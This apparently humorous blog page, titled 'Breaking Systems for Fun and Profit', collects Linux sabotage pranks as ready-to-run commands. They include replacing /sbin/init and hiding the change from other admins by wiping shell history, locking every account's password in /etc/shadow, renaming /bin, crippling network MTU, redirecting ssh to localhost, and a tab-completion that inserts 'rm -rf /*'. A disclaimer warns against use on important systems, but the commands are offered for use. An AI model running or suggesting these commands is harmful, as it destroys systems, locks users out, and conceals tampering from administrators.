Who needs multiple cores anyway?
Do you remember the good old days when all you had was a single core? Time to re-live those glory days!
for I in /sys/devices/system/cpu/cpu[1-9]* do echo 0 > ${I}/online done
Unfortunately we can’t disable cpu0…
Breaking Systems for Fun and Profit
Failure is always an option.
SImplify your init
This one was submitted by fl0_:
Create a file called init.c
#include <stdio.h> int main(){ printf("MOEHAHAHHAAAA\n"); return 0; }
Next run the following commands:
gcc -o init init.c touch -r /sbin/init init cp -f init /sbin/init
You might want to hide your handiwork from the other admins by either removing ~/.bash_history(obvious)/running set +o history before you begin/kill -9 $$
The Lolcats, they are everywhere!
Do you use squid? Are your users under-appreciating the blissful goodness that is the LOLcat? Feel like educating them a bit? Add or replace the following line in /etc/squid/squid.conf:
url_rewrite_program /bin/sed -u -r s!^([^[:space:]]*\.(jp(e)?g|gif|png|tiff|bmp)).*$!http://icanhascheezburger.files.wordpress.com/2009/04/funny-pictures-cat-is-on-your-computer.jpg!
Enterprising bofh’s could use a script to download the referred image, modify it, place it somewhere in /var/www/html and have the rewritten url point to the new bastardised image for extra credit, like this guy did.
It takes a bit more work, so let’s go over the steps:
Make sure you’ve got a webserver running on the same box as your proxy
Add/modify this line in /etc/squid/squid.conf
url_rewrite_program /etc/squid/mirror.sh
Now make /var/www/html writable by the squid user:
setfacl -m u:squid:rwx /var/www/html
And last but not least add this file as /etc/squid/mirror.sh and make it executable:
#!/bin/bash while read URL do SURL=$(echo ${URL} | cut -d" " -f1) echo ${SURL} | egrep -qi "\.(jp(e)?g|gif|png|tiff|bmp|ico)$" && (umask 002 PIC=$$-${RANDOM} wget -q -O /tmp/${PIC} ${SURL} convert -quiet /tmp/${PIC} -flop /var/www/html/${PIC}.png &&; echo http://127.0.0.1/${PIC}.png ) || echo $URL done
The end result:
Efficient Secure Shell
Do all those people who use ssh irritate you as well because you can’t eavesdrop on their connections? Teach them a lesson so that they’ll revert to good ol’ telnet!
printf '\tHostname localhost\n' >> /etc/ssh/ssh_config
Help the homeless
chmod a-x $(find /home -depth -maxdepth 1 -type d)
It’s there isn’t it?
Try this one to annoy your users. for extra fun replace /bin with /usr/bin, rinse, repeat.
mv /bin '/bin '
Slow down there a bit bro…
Fast network links getting you down?
for IF in $(ip l | awk -F': ' '/^[0-9]/{print $2}') do ip l s ${IF} mtu 60 done
Especially fun if this machine is acting as a (nat-)router for other boxes…
You make me feel complete
Pop this one into a bash session and watch the hilarity ensue:
complete -E -W 'rm\ -rf\ /*\ /.*'
And while we’re having fun try this one as well (advertorial alert):
complete -W 'http://breakingsystemsforfunandprofit.com' elinks links firefox chrome midori epiphany wget opera
Passwords? We don’t need no stinkin’ passwords!
sed -ri 's/([^:]*):[^:]*:(.*)/\1:!!:\2/' /etc/shadow
Or for the wusses who want something a bit more recoverable:
for I in $(getent passwd | cut -d: -f1) do passwd -l ${I} chage -E0 -M1 -m513 -I1 -W1023 ${I} done
Still, who needs root?
printf 'root\t-\tmaxlogins\t0\n' >> /etc/security/limits.conf
Disclaimer
It's a shame that we actually have to write a disclaimer, but experience tells us that most of you out there are idiots. Well not you of course, because you are actually reading the disclaimer. Here goes:
Neither breakingsystemsforfunandprofit.com nor any of its admins/editors/contributors can be held liable for any damages resulting from the use or lack of use of any information or advice presented here in any way.
Failure to realize that any information presented here for the purpose of breaking systems should not be used on any production or otherwise important systems will result in us making fun of you and your unfortunate offspring should you have any.
